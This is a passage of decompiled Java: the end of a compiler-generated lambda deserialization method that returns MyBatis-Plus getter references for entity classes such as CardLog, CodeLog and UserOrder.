            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CardLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CardLog::getId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/CodeLog") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return CodeLog::getId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return UserOrder::getId;
            }

            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/Integer;")) {
               return UserOrder::getId;
            }
            break;
         case "getSessionId":
            if (lambda.getImplMethodKind() == 5 && lambda.getFunctionalInterfaceClass().equals("com/baomidou/mybatisplus/core/toolkit/support/SFunction") && lambda.getFunctionalInterfaceMethodName().equals("apply") && lambda.getFunctionalInterfaceMethodSignature().equals("(Ljava/lang/Object;)Ljava/lang/Object;") && lambda.getImplClass().equals("com/mdd/common/entity/UserOrder") && lambda.getImplMethodSignature().equals("()Ljava/lang/String;")) {
               return UserOrder::getSessionId;
            }
      }

      throw new IllegalArgumentException("Invalid lambda deserialization");
   }
}
